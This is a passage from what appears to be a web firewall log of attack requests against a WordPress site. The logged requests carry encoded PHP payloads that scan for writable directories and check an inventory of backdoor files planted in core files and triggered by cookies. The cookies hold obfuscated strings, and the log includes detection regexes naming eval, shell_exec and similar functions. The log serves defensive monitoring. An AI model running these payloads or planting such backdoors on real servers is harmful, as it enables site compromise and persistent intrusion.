%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:3339\nsec-ch-ua:\"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvrKRvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYz9vK2ywo252K2uuozEfMFV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nhost:dewenlabels.com\n\nyq=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 04:19:43","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> fx:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\naccept:*\/*\naccept-encoding:gzip,deflate\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMatvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAyoaEypvV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-length:3339\nhost:dewenlabels.com\n\nfx=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 04:20:17","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> gl:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:3339\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvM2jvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAiozMcMlV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nhost:dewenlabels.com\n\ngl=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 04:34:37","213.209.159.254","POST","\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> kC:%3C%3Fphp%20%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%2C%0A%22\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/class-wp-taxonomy.php%22%3D%3E%22bd%40%40320334573%40%4023%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20","POST \/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\ncontent-length:4899\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"\nsec-ch-ua-mobile:?0\ncookie:4=e367ba33cbb513d4c0b57eb3026dd8cc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvn0ZvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyhL2k1MTHvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nsec-ch-ua-platform:\"Windows\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47\n\nkC=%3C%3Fphp%20%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%2C%0A%22\/wp-includes\/sitemap